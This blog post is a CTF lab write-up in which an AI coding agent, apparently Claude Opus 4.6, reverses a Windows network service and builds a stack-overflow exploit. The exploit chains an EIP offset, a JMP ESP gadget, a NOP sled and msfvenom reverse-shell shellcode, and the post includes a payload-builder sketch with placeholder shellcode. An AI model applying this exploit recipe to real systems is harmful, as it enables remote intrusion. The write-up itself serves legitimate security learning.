Introduction
Last weekend I was working on a CTF lab where capturing one of the flags required exploiting a local service vulnerable to a stack overflow. I had limited shell access on that system through a remote code execution vulnerability in an application, which allowed me to identify a service listening on port 8080 on localhost.
The underlying operating system was Windows 10, which raised an immediate challenge: I needed a matching environment to debug the binary and develop a working exploit, and I did not have access to an Intel-based machine. This is where Claude Opus came into the picture. Out of curiosity, I asked Claude to write an exploit without a Windows 10 machine, and it produced a working exploit within a few minutes.
Setup
The setup I used was:
- macOS with Claude Desktop and the Opus 4.6 model - Host system used during the CTF
- Kali Linux ARM as a virtual machine - System with VPN connection to the lab
- Vulnerable binary downloaded and copied to Kali Linux
- Double pivot tunnel using Ligolo-ng - Advanced tunneling tool (alternative to Chisel)
Establishing Access to Port 8080
Below is the network diagram of the lab, where the Target Server is the system running the vulnerable binary on port 8080 on localhost.
To access the Target Server, I used Ligolo-ng for tunneling. Below is a summary of the steps carried out to establish the tunnel.
- The Linux Server on 10.10.100.10 ran a Ligolo-ng agent connected to the Ligolo-ng proxy running on the attacker's system.
- A route to 172.20.10.0/24 via tunnel 1 was added on the attacker's system.
- A listener was added on this Linux Server so that connections on port 4444 would be forwarded to port 11601, the port on which the Ligolo-ng proxy accepts agent connections.
- The Ligolo-ng agent on the Target Server connected to listener port 4444 on the Linux Server, which relayed the traffic through the first agent to the Ligolo-ng proxy on the attacker's system, establishing the second tunnel.
- A route to 240.0.0.1/24 via tunnel 2 was added on the attacker's system. 240.0.0.0/4 is a magic CIDR that allows access to local ports on connected agents.
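The addressing in the last step can be sanity-checked from Kali before involving any other tooling. The sketch below uses only the Python standard library to confirm that 240.0.0.1 falls inside the 240.0.0.0/4 range and to probe a TCP port. The helper names `in_magic_range` and `port_is_open` and the timeout value are my own illustrative choices, not part of Ligolo-ng.

```python
import ipaddress
import socket

MAGIC_RANGE = ipaddress.ip_network("240.0.0.0/4")  # range quoted in the steps above


def in_magic_range(addr: str) -> bool:
    """Return True if addr falls inside 240.0.0.0/4."""
    return ipaddress.ip_address(addr) in MAGIC_RANGE


def port_is_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Attempt a TCP connect and report whether it succeeded."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


# Usage, once both tunnels and routes are up:
#   in_magic_range("240.0.0.1")
#   port_is_open("240.0.0.1", 8080)
```

A successful connect only shows that the route and tunnel work; it says nothing about what is listening on the other end.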
Now that Kali Linux could reach the vulnerable service at 240.0.0.1:8080, it was time to point Claude Code at this Kali system and let it run. The objective was to give Claude Code access to an environment where all the tools were installed and the route to the affected service was already set up.
The section below contains the prompts used and the output from Claude Opus 4.6.
Note: I have modified some text to prevent disclosure of sensitive information, both about my network and about the CTF solution.
Prompt 1:
There is the vulnerable.exe file under path /home/analyst/Desktop/ctf/ on Kali virtual machine which is vulnerable to stack overflow. This is part of the CTF where the machine on which this vulnerable.exe is running has below configuration. It is listening on port 8080 on IP 240.0.0.1.
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
I want your help to come up with an exploit written in Python for this. I have the tools you need installed on Kali Linux ARM virtual machine. You can SSH to this Kali Linux using 192.168.10.10 IP address and user analyst. The SSH password is <redacted>. I do not have Windows 10 machine where I can debug the binary so check if you can write the exploit using the current setup.
Claude Output:
Claude Code taking initial SSH access to Kali Linux
I'll help you with this CTF challenge. Let me SSH into your Kali VM and examine the binary first.
SSH requires interactive password input. Let me use `expect` to automate the login.
Initial analysis of the file, basically what you would normally do using file and checksec
Good - it's a PE32 executable (32-bit Intel i386 Windows binary). Let me do deeper static analysis.
Excellent! This is a network service that asks for a password. Let me get more details about the binary structure and look for the password handling and vulnerability.
Now let me disassemble the binary to find the vulnerability details.
Radare2 is available. Let me use it to analyze the binary - find the vulnerability, check protections, and find useful gadgets.
Key findings:
- 32-bit x86 PE binary
- NX (DEP) is disabled (nx: false) - we can execute shellcode on the stack!
- ASLR/PIC disabled (pic: false) - addresses are predictable
- Canary: true - but let's verify if it's actually used in the vulnerable function
- Compiled with MSVC (Windows)
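As far as I understand, the nx and pic values reported above reflect flags in the DllCharacteristics field of the PE optional header. As a rough cross-check that does not depend on radare2, the sketch below reads that field using only the standard library. The function name `pe_mitigations` is hypothetical, and a stack canary cannot be detected this way because it is not a header flag.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP opt-in


def pe_mitigations(data: bytes) -> dict:
    """Report the ASLR and DEP opt-in flags of a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew (offset 0x3C) points at the "PE\0\0" signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # Signature (4 bytes) + COFF header (20 bytes) precede the optional header;
    # DllCharacteristics sits 70 bytes into it for both PE32 and PE32+.
    (flags,) = struct.unpack_from("<H", data, pe_offset + 24 + 70)
    return {
        "aslr": bool(flags & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(flags & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


# Usage (path taken from the prompt above):
# with open("/home/analyst/Desktop/ctf/vulnerable.exe", "rb") as fh:
#     print(pe_mitigations(fh.read()))
```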
File reversing to understand the application input flow
Now let me analyze the vulnerable function to find the overflow offset.
Let me look at the main function and the function that handles the password/recv to find the overflow.
Main calls fcn.1047440e. Let me disassemble that function.
It jumps to fcn.10477d80. Let me disassemble that - this should be the main server function.
So after accept(), it calls fcn.1047299c which handles the client connection. Let me disassemble that function - this is likely where the vulnerability lives.
Another jump. Let me follow it to fcn.10477d10.
Now I can see the flow:
- Server sends "Enter User Name: "
- Receives username, compares with "iroot" (5 bytes)
- If username is "iroot", sends "User Password: " and receives password
- Then calls fcn.10473ac7 with the password buffer
The password handling function fcn.10473ac7 is likely where the overflow happens. Let me analyze it and the recv function.
Identify JMP ESP address
Now I found the vulnerability. Let me also look at the fcn.10472631 function which copies the data, and check what recv function looks like.
This is strncpy_s or similar. Now let me also look at the recv function (fcn.1047269f) which reads user input and check if it has size limits.
Now I have a clear picture. Let me find a JMP ESP gadget for the exploit.
Found JMP ESP gadgets. Let me check these addresses for null bytes:
- 0x10477d73 = \x73\x7d\x47\x10 - no null bytes!
Let me also search for CALL ESP as a backup, and verify the JMP ESP gadget is in executable section.
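The null-byte check above is easy to reproduce. On 32-bit x86 the return address is stored on the stack in little-endian order, so the gadget address has to be packed that way and then inspected for bad characters. A minimal sketch, in which the helper name `pack_gadget` is made up for illustration and 0x00 is assumed to be the only bad character:

```python
import struct

BAD_CHARS = b"\x00"  # assumption: only the null byte is bad


def pack_gadget(address: int, bad_chars: bytes = BAD_CHARS) -> bytes:
    """Pack a 32-bit address little-endian and reject it if it holds a bad byte."""
    packed = struct.pack("<I", address)
    found = sorted(set(packed) & set(bad_chars))
    if found:
        raise ValueError(f"address contains bad bytes: {found}")
    return packed


print(pack_gadget(0x10477D73).hex())  # 737d4710
```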
Vulnerability Summary
I now have all the information needed. Here's the vulnerability summary:
Vulnerability Analysis:
- Password handler (0x10477cb0) allocates a 1024-byte (0x400) stack buffer
- Calls strncpy_s(stack_buf, 2049, user_input, 2048) - copies up to 2048 bytes into a 1024-byte buffer
- DEP disabled, ASLR disabled, no stack canary in the vulnerable function
- JMP ESP gadget at 0x10477d73 (no null bytes)
- EIP overwrite offset: 1024 (buffer) + 4 (saved EBP) = 1028 bytes
- Bad character: 0x00 (null terminates strncpy_s)
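The numbers in this summary follow from simple arithmetic on the stack layout. The sketch below restates them. The constant names are mine, and the layout (buffer directly below the saved EBP, with no padding) is the assumption the static analysis makes, which a live scan would need to confirm.

```python
BUFFER_SIZE = 0x400      # 1024-byte stack buffer
SAVED_EBP_SIZE = 4       # 32-bit saved frame pointer
RET_ADDR_SIZE = 4        # 32-bit return address
MAX_COPY = 2048          # count passed to strncpy_s per the summary

eip_offset = BUFFER_SIZE + SAVED_EBP_SIZE      # bytes before the return address
overwrite_end = eip_offset + RET_ADDR_SIZE     # first length that fully replaces it
room_after_ret = MAX_COPY - overwrite_end      # bytes left after the return address

print(eip_offset, overwrite_end, room_after_ret)  # 1028 1032 1016
```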
Adjusting Exploit and Gaining Shell :)
Let me generate shellcode and write the exploit.
Now let me write the complete exploit script and deploy it to the Kali VM.
Let me verify the exploit runs without errors (the assertions pass) and test connectivity to the target.
Good results:
Offset confirmed: sizes up to 1050 returned responses, size 1100 crashed the server — so EIP overwrite is somewhere between 1050 and 1100. This means there might be slight additional padding (compiler alignment). Let me also note that 1032 returned empty (no "Wrong password!") which is interesting — we're starting to corrupt the stack there.
Kali IP: 10.10.14.22 (on tun0 — this is the VPN interface to reach the target)
The offset might need a small adjustment. Let me run a more precise scan around the 1032-1100 range, and simultaneously generate shellcode.
The results confirm our analysis. Key observations:
- Sizes 1028-1040 return "Wrong password!" — this is expected because the server sends the response before the function returns and crashes
- Crashes start at 1044+ — the intermittent timeouts mean the thread crashes on ret after we corrupt EIP
- Offset 1028 is correct — at 1032 bytes we overwrite EIP (1028 padding + 4 bytes of return address)
- The Kali IP on tun0 is 10.10.10.200. Let me generate shellcode and finalize the exploit.
Shellcode generated — 351 bytes, shikata_ga_nai encoded, no null bytes. Now let me update the exploit and deploy it.
Now copy the updated exploit to Kali, start a listener, and fire it.
Now start the netcat listener in the background, then fire the exploit:
Exploit sent successfully! Let me check if the shell connected to our listener:
We got a reverse shell! The exploit worked perfectly.
Prompt 2:
Explain the role of exploit.py and fine_scan.py files that you generated.
Claude Output:
fine_scan.py - EIP Offset Finder
This is a reconnaissance script used to pinpoint the exact buffer size that crashes the target. It:
- Connects to the Server on 240.0.0.1:8080
- Authenticates with username iroot
- Sends increasingly large payloads (1028 to 1080 bytes, in 4-byte increments) as the "password"
- Reports whether each size keeps the server alive or causes a crash/timeout
The goal is to find the precise EIP overwrite offset — the exact number of bytes needed to overwrite the saved return address on the stack. The transition from "ALIVE" to "CRASH" tells you the offset is between those two sizes.
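The ALIVE-to-CRASH transition described above can be located mechanically once the per-size results are collected. The sketch below assumes the results are recorded as a mapping from payload size to a status string. The function name is hypothetical, and the sample statuses are a simplification of the observation reported earlier (crashes from 1044 onward), not the raw scan output.

```python
from typing import Optional, Tuple


def find_transition(results: dict) -> Optional[Tuple[int, int]]:
    """Return (last ALIVE size, first CRASH size), or None if there is no transition."""
    previous = None
    for size in sorted(results):
        if results[size] == "CRASH" and previous is not None:
            return previous, size
        if results[size] == "ALIVE":
            previous = size
    return None


# Sizes the scan walks through: 1028 to 1080 in 4-byte steps.
sizes = list(range(1028, 1081, 4))

# Simplified statuses, used purely to exercise the function.
sample = {size: ("ALIVE" if size < 1044 else "CRASH") for size in sizes}
print(find_transition(sample))  # (1040, 1044)
```

Because the server can reply before the vulnerable function returns, the first crashing size is an upper bound on the offset rather than the offset itself.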
exploit.py - Stack Buffer Overflow Exploit
This is the actual exploit that leverages the vulnerability found by fine_scan.py. The attack chain:
- Vulnerability: The Server's password handler (fcn.10477cb0) allocates a 1024-byte (0x400) stack buffer but calls strncpy_s allowing up to 2048 bytes — a classic stack buffer overflow.
- Payload structure (1399 bytes total):
  - 1028 bytes of "A": fills the buffer (1024) + saved EBP (4)
  - JMP ESP gadget (0x10477d73): overwrites the return address (EIP) to jump to the stack
  - 16-byte NOP sled: landing zone for the jump
  - 351-byte shellcode: msfvenom-generated windows/shell_reverse_tcp (shikata_ga_nai encoded, no null bytes)
- Execution flow: Connects to the server, sends iroot as username, then sends the overflow payload as the password. The server's ret instruction jumps to the gadget, which jumps to ESP (the NOP sled), which slides into the reverse shell shellcode connecting back to 10.10.10.200:443.
In short: fine_scan.py found where to aim, and exploit.py delivers the payload that gives you a remote Windows shell.
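The payload layout can be expressed as a small builder that checks its own invariants. This is a sketch of the structure described above, not the generated exploit.py: the function name `build_payload` is hypothetical, the shellcode is a non-functional placeholder of the same length, and 0x00 is assumed to be the only bad character.

```python
import struct

OFFSET = 1028              # buffer (1024) + saved EBP (4)
JMP_ESP = 0x10477D73       # gadget address from the analysis
NOP_SLED = b"\x90" * 16    # 16-byte landing zone
BAD_CHARS = b"\x00"        # assumption: only the null byte is bad


def build_payload(shellcode: bytes) -> bytes:
    """Assemble padding + return address + NOP sled + shellcode."""
    payload = b"A" * OFFSET + struct.pack("<I", JMP_ESP) + NOP_SLED + shellcode
    if any(b in BAD_CHARS for b in payload):
        raise ValueError("payload contains a bad character")
    return payload


placeholder = b"\xcc" * 351          # stand-in for the 351-byte msfvenom output
payload = build_payload(placeholder)
print(len(payload))                  # 1399
```

The listed components (1028 + 4 + 16 + 351) sum to 1399 bytes, and the bad-character check covers the whole payload, including the packed gadget address.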
Conclusion
Using Claude to tackle CTF challenges turned out to be a genuinely rewarding experience. What started as a shortcut to avoid hunting down a remote Windows 10 setup ended up being something exciting. Admittedly, the example above was relatively simple, and the model might have struggled or failed outright had there been more bad characters or had ASLR or DEP been enabled. Still, the results were compelling enough that I plan to try it on other CTFs, simple and complex alike.